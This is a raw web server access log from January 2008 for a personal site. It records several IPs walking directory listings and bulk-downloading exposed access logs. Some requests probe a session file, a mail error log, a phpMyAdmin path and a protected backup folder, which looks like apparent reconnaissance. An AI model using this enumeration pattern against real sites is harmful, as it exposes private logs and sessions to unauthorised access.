86.143.10.239 - - [16/Jan/2008:15:25:56 -0800] "GET /mobileoffice/?D=A HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:25:57 -0800] "GET /presto/?N=D HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:25:58 -0800] "GET /presto/?A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:58 -0800] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:25:58 -0800] "GET /retreat1/webcam/?N=D HTTP/1.1" 200 589505 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:00 -0800] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:00 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:00 -0800] "GET /presto/?M=D HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:00 -0800] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:01 -0800] "GET /tmp/ HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:02 -0800] "GET /tmp/?N=D HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:04 -0800] "GET /logs/access_080116.log HTTP/1.1" 200 601743 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:04 -0800] "GET /tmp/?N=A HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:05 -0800] "GET /tmp/?A HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:06 -0800] "GET /tmp/?M=A HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:06 -0800] "GET /tmp/?D=A HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:06 -0800] "GET /tmp/?M=D HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:07 -0800] "GET /tmp/?D=D HTTP/1.1" 200 828 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:07 -0800] "GET /megumi/Bracelet/?N=A HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:07 -0800] "GET /logs/access_071013.log HTTP/1.1" 200 46816 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:08 -0800] "GET /logs/access_070914.log HTTP/1.1" 200 86919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:09 -0800] "GET /mobileoffice/?D=D HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:10 -0800] "GET /megumi/Bracelet/?N=D HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:10 -0800] "GET /logs/access_071106.log HTTP/1.1" 200 29238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:12 -0800] "GET /logs/access_071005.log HTTP/1.1" 200 49825 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:13 -0800] "GET /logs/access_080108.log HTTP/1.1" 200 413211 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:15 -0800] "GET /logs/access_070906.log HTTP/1.1" 200 32974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:15 -0800] "GET /logs/access_070828.log HTTP/1.1" 200 86379 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:16 -0800] "GET /minamijewelry/?M=A HTTP/1.1" 200 2116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:17 -0800] "GET /minamijewelry/html/kids.html HTTP/1.1" 200 19771 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:17 -0800] "GET /funny/?D=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:18 -0800] "GET /?D=A HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:18 -0800] "GET /minamijewelry/?M=D HTTP/1.1" 200 2110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:18 -0800] "GET /logs/access_070727.log HTTP/1.1" 200 35863 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:19 -0800] "GET /logs/access_071121.log HTTP/1.1" 200 61524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:20 -0800] "GET /?D=D HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:21 -0800] "GET /funny/?D=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:21 -0800] "GET /logs/access_070626.log HTTP/1.1" 200 32190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:21 -0800] "GET /logs/access_071020.log HTTP/1.1" 200 15561 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:22 -0800] "GET /logs/access_070921.log HTTP/1.1" 200 70813 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:22 -0800] "GET /logs/access_070719.log HTTP/1.1" 200 50682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:24 -0800] "GET /minamijewelry/html/contact.html HTTP/1.1" 200 12370 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:24 -0800] "GET /logs/access_071113.log HTTP/1.1" 200 4345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:25 -0800] "GET /logs/access_071012.log HTTP/1.1" 200 75692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:28 -0800] "GET /logs/access_080115.log HTTP/1.1" 200 606378 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:28 -0800] "GET /logs/access_070913.log HTTP/1.1" 200 105654 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:28 -0800] "GET /megumi/earrings/?N=A HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:29 -0800] "GET /logs/access_071105.log HTTP/1.1" 200 54880 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:30 -0800] "GET /megumi/earrings/?N=D HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:32 -0800] "GET /logs/access_071229.log HTTP/1.1" 200 314379 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:33 -0800] "GET /logs/access_080107.log HTTP/1.1" 200 561463 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:36 -0800] "GET /logs/access_071004.log HTTP/1.1" 200 70439 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:37 -0800] "GET /logs/access_070905.log HTTP/1.1" 200 42196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:38 -0800] "GET /logs/access_070827.log HTTP/1.1" 200 214217 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:39 -0800] "GET /logs/access_070726.log HTTP/1.1" 200 41609 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:42 -0800] "GET /logs/access_071120.log HTTP/1.1" 200 34560 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:42 -0800] "GET /minamijewelry/?D=A HTTP/1.1" 200 2110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:44 -0800] "GET /retreat1/?M=A HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:44 -0800] "GET /retreat1/webcam/?N=A HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:45 -0800] "GET /minamijewelry/?D=D HTTP/1.1" 200 2110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:45 -0800] "GET /tmp/mailError.log HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:47 -0800] "GET /logs/access_070819.log HTTP/1.1" 200 28182 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:47 -0800] "GET /logs/access_070625.log HTTP/1.1" 200 28817 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:47 -0800] "GET /retreat1/?M=D HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:48 -0800] "GET /logs/access_070920.log HTTP/1.1" 200 56600 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:48 -0800] "GET /logs/access_070718.log HTTP/1.1" 200 45557 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:49 -0800] "GET /logs/access_071112.log HTTP/1.1" 200 46565 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:50 -0800] "GET /megumi/Bracelet/?A HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:26:50 -0800] "GET /?A HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:51 -0800] "GET /logs/access_071011.log HTTP/1.1" 200 23938 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:51 -0800] "GET /logs/access_070912.log HTTP/1.1" 200 65147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:53 -0800] "GET /logs/access_080114.log HTTP/1.1" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:54 -0800] "GET /logs/access_071104.log HTTP/1.1" 200 75933 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:26:55 -0800] "GET /megumi/?A HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:26:56 -0800] "GET /logs/access_071003.log HTTP/1.1" 200 36511 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:26:56 -0800] "GET /logs/access_080106.log HTTP/1.1" 200 367696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:00 -0800] "GET /logs/access_071228.log HTTP/1.1" 200 398582 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:00 -0800] "GET /logs/access_070904.log HTTP/1.1" 200 30421 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:01 -0800] "GET /logs/access_070826.log HTTP/1.1" 200 50531 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:02 -0800] "GET /logs/access_070725.log HTTP/1.1" 200 66166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:02 -0800] "GET /logs/access_070818.log HTTP/1.1" 200 36125 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:02 -0800] "GET /logs/access_070624.log HTTP/1.1" 200 110201 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:04 -0800] "GET /retreat1/?D=A HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:04 -0800] "GET /tmp/sess_b6279367c8b69e95bdfb12651e63da55 HTTP/1.1" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:05 -0800] "GET /logs/access_070717.log HTTP/1.1" 200 2718 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:05 -0800] "GET /retreat1/?D=D HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:05 -0800] "GET /logs/access_071111.log HTTP/1.1" 200 72697 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:07 -0800] "GET /logs/access_071010.log HTTP/1.1" 200 39814 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:07 -0800] "GET /logs/access_080113.log HTTP/1.1" 200 324995 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:07 -0800] "GET /logs/access_070911.log HTTP/1.1" 200 86699 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:09 -0800] "GET /logs/access_070709.log HTTP/1.1" 200 30963 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:11 -0800] "GET /logs/?A HTTP/1.1" 200 31023 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:11 -0800] "GET /logs/access_071103.log HTTP/1.1" 200 57650 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:14 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:15 -0800] "GET /logs/access_071002.log HTTP/1.1" 200 70737 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:15 -0800] "GET /logs/access_080105.log HTTP/1.1" 200 398380 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:20 -0800] "GET /logs/access_071227.log HTTP/1.1" 200 452672 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:20 -0800] "GET /logs/access_070903.log HTTP/1.1" 200 12137 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:21 -0800] "GET /logs/access_070825.log HTTP/1.1" 200 82596 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:22 -0800] "GET /megumi/Necklace/?A HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:25 -0800] "GET /logs/access_070724.log HTTP/1.1" 200 173704 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:25 -0800] "GET /logs/access_071219.log HTTP/1.1" 200 181961 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:26 -0800] "GET /logs/access_070817.log HTTP/1.1" 200 59720 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:31 -0800] "GET /megumi/?N=A HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:33 -0800] "GET /logs/access_070716.log HTTP/1.1" 200 34661 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:34 -0800] "GET /minamijewelry/dream.psd HTTP/1.1" 200 109304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:34 -0800] "GET /logs/access_071110.log HTTP/1.1" 200 74683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:37 -0800] "GET /tools/ HTTP/1.1" 200 12404 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:39 -0800] "GET /megumi/?N=D HTTP/1.1" 200 937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:39 -0800] "GET /backup2/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:40 -0800] "GET /tools/css/phpmyadmin.css.php?lang=en&js_frame=right HTTP/1.1" 200 11212 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:40 -0800] "GET /tools/css/phpmyadmin.css.php?lang=en&js_frame=right&js_isDOM= HTTP/1.1" 200 12284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:42 -0800] "GET /logs/access_070809.log HTTP/1.1" 200 38136 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:43 -0800] "GET /logs/access_070910.log HTTP/1.1" 200 50863 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:45 -0800] "GET /logs/access_080112.log HTTP/1.1" 200 655360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:47 -0800] "GET /logs/access_070708.log HTTP/1.1" 200 169855 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:47 -0800] "GET /logs/access_071102.log HTTP/1.1" 200 7391 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:48 -0800] "GET /logs/access_070731.log HTTP/1.1" 200 34839 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:49 -0800] "GET /bikes/ HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:53 -0800] "GET /bikes/?N=D HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:53 -0800] "GET /bikes/GPS/ HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:27:53 -0800] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:54 -0800] "GET /bikes/GPS/?M=A HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:55 -0800] "GET /bikes/GPS/?D=A HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:27:56 -0800] "GET /bikes/GPS/?M=D HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:57 -0800] "GET /bikes/GPS/?D=D HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:27:57 -0800] "GET /bikes/?N=A HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:27:58 -0800] "GET /bikes/CreSTOC07/?A HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:28:00 -0800] "GET /bikes/GPS/?N=A HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:28:00 -0800] "GET /bikes/CreSTOC07/?N=D HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
